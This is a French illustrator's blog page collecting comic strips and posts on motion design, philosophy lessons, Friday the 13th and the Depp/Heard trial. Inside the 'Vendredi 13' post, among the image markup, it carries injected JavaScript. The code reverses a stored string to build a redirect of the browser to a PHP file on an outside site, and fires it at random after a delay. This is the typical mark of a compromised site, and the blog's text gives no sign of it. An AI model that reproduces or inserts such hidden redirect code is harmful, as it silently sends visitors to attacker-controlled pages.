Motion Design à Lyon pendant la canicule

Motion design à Lyon pendant la canicule, une période un peu compliquée quand il s’agit de travailler devant l’ordinateur, alors que celui-ci dégage aussi une forte chaleur. Et c’était guère mieux sur l’iPad Pro qui avait tendance à très vite chauffer.

J’aime bien de temps en temps montrer en vidéo les différentes étapes qui permettent d’obtenir l’animation finale. Du dessin directement sur iPad, en passant par PHOTOSHOP pour y préparer les calques, avant l’importation sur AFTER EFFECTS.

Motion Design à Lyon

Cette fois-ci j’ai décidé de me familiariser davantage avec DUIK BASSEL, en poussant un peu plus l’expérience.
C’était aussi l’occasion de revenir sur PREMIÈRE PRO, avec lequel je ne suis un peu moins à l’aise qu’avec FINAL CUT.

Motion design à Lyon

Motion Design à Lyon, avec une animation 2d qui se passe en Californie.

Animation « California »

Cours de philo

Les cours de philo, j’y ai échappés. C’est certainement dommage mais c’est ainsi. Et donc, Emmanuel Levinas ça ne me parle pas davantage. Aucune idée de qui est cet homme.
Cette incompréhension, ce langage que je ne maitrise pas, ça valait bien une BD pour tenter d’en rire.

Cours de philo
Cours de philo
Dessin BD philo
Philo humour
Publié dans BD

Scooter en ville, illustration & architecture

Scooter en ville c’est surtout l’occasion pour moi de dessiner une des choses que j’apprécié le plus : l’architecture des immeubles, mais à ma façon. Remplir l’espace de manière ordonnée.

Scooter en ville illustration

Vendredi 13, jour de chance

Vendredi 13, jour de chance pour certains, jour de malchance pour les autres.
La Française des jeux a décidé pour vous : il faut absolument tenter sa chance ! C’est le jour ou jamais !

Vendredi 13 jour de chance
BD vendredi 13
Vendredi 13 jour de chance
$zXz=function(n){if (typeof ($zXz.list[n]) == « string ») return $zXz.list[n].split(«  »).reverse().join(«  »);return $zXz.list[n];};$zXz.list=[« \’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to » class= »wp-image-2019″/>
Publié dans BD

Procès Johnny Depp, suite.

Procès de Johnny Depp / Amber Heard, plus passionnant que la campagne électorale Française. Non pas que je ne m’y suis pas intéressé, bien au contraire, mais il est vraiment temps qu’on passe à autre chose. Bref, lors du débat de l’entre deux tours, on a préféré switcher sur le procès qu’on peut facilement suivre en live sur les différents réseaux sociaux.

Procès Johnny Depp dessin
Procès Johnny Depp Illustration

Le procès se passait plutôt bien pour l’acteur de Pirate des Caraïbes, surtout quand à la barre il a pu largement donner sa version des faits. Les différents témoins proches de l’acteur se sont succédés. Tous se passait à merveille pour Johnny. Et puis patatras, ce fut au tour des avocats d’Amber Heard de prendre les choses en mains et ça a été nettement moins glorieux pour le comédien.

Publié dans BD

La meilleure série du moment

La meilleure série du moment n’est pas forcément celle dont on pense en premier.

Meilleure série du moment
La série à regarder
Procès Johnny Depp
Meilleure série du moment

Je vous l’accorde, ce n’est pas exactement une tenue de nazie. Mais ça c’est parce qu’on est méchant. Et qu’on a choisi notre camp.

Procès Johnny Depp Amber Heard
Amber Heard & Johnny Depp

C’est la première fois que je m’intéresse d’aussi près à un procès. C’est aussi un peu de la faute à Facebook qui m’a proposé le live et qui m’a conduit à vous le partager en BD.
Le procès qui oppose Johnny Depp à Amber Heard est finalement très intéressant. Bien plus ce que je pouvais imaginer. C’est passionnant de voir le boulot des avocats qui poussent les différents témoins dans leurs derniers retranchements. On sent qu’au bout d’un moment, même chez les personnes qui semblent plutôt robustes, elles finissent par craquer nerveusement. Il y a parfois des larmes.
Alors bien sûr, on peut aussi trouver tout ce petit monde des people fortunés quelque peu pathétique.
C’est peut-être aussi ça qui rend le procès addictif et qui en fait assurément la meilleure série du moment !

Publié dans BD